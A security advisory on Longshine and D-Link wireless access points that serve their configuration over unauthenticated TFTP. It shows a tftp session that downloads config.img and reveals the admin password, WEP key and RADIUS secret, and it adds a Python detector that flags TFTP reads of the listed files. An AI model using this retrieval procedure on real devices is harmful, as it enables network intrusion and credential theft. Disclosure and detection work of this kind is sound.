COMMAND

    Various WLAN Access-Points reveal admin password via tftp of config file

SYSTEMS AFFECTED

    Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
    Versions 03.01.0b and 03.01.0h
    (Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.)
    DLink DI-614+ firmware version 2.03

PROBLEM

    Thanks to Lukas Grunwald aka REG lg1 [lukas@dnx.de] advisory :

    You are able to connect via tftp to the access-point and you can
    download the configuration without authentication. In this
    configuration the username of the superuser and the corresponding
    password are stored. The WEP secret for the encryption and the
    password from your radius server are also readable.

    This "attack" works via WLAN (!!!) and Ethernet.

        tftp
        tftp> connect 192.168.108.48
        tftp> get config.img
        Received 780 bytes in 1.0 seconds
        tftp> quit
        [~]/-\>strings config.img
        DNXLABAP01   <- name of the AP
        root         <- name of the superuser
        XXXXXX123    <- password from superuser
        DNXLABLAN    <- ssid
        secu9        <- secret for WEP
        7890abcdef   <-

    You are also able to get the following files:

        config.img
        wbtune.dat
        mac.dat
        rom.img
        normal.img

SOLUTION

    None yet
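
    With no fix available, one detection-side measure is to watch for TFTP read
    requests that name the files listed above. The following is an added example,
    not part of the original advisory: it parses RFC 1350 read-request (RRQ)
    payloads seen on UDP port 69 and flags the advisory's file names. The
    function names, the requesting address 192.168.108.77 and the sample packets
    are constructed, and case-insensitive name matching is an assumption.

```python
import struct

# File names taken from the advisory's list of retrievable files.
SENSITIVE = {"config.img", "wbtune.dat", "mac.dat", "rom.img", "normal.img"}
OP_RRQ = 1  # RFC 1350 opcode for a read request (2 would be a write request)


def parse_rrq(payload: bytes):
    """Return (filename, mode) for a well-formed TFTP RRQ payload, else None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode != OP_RRQ:
        return None
    # Layout: opcode | filename | NUL | mode | NUL [| options (RFC 2347)]
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None


def flag_requests(packets):
    """packets: iterable of (src_ip, dst_ip, udp_payload) sent to UDP port 69.
    Returns a list of (src_ip, dst_ip, matched_name) for sensitive reads."""
    alerts = []
    for src, dst, payload in packets:
        rrq = parse_rrq(payload)
        if rrq is None:
            continue
        # Assumption: compare on the base name, ignoring case and any path.
        name = rrq[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name in SENSITIVE:
            alerts.append((src, dst, name))
    return alerts


# Constructed sample payloads (not captured traffic).
SAMPLE = [
    ("192.168.108.77", "192.168.108.48", b"\x00\x01config.img\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", b"\x00\x01motd.txt\x00netascii\x00"),
    ("192.168.108.77", "192.168.108.48", b"\x00\x02config.img\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", b"\x00\x01/ROM.IMG\x00octet\x00"),
]

if __name__ == "__main__":
    for alert in flag_requests(SAMPLE):
        print("TFTP read of sensitive file: %s -> %s (%s)" % alert)
```

    Only the initial request goes to port 69; the data transfer continues from
    an ephemeral server port, so the RRQ is the packet to match on.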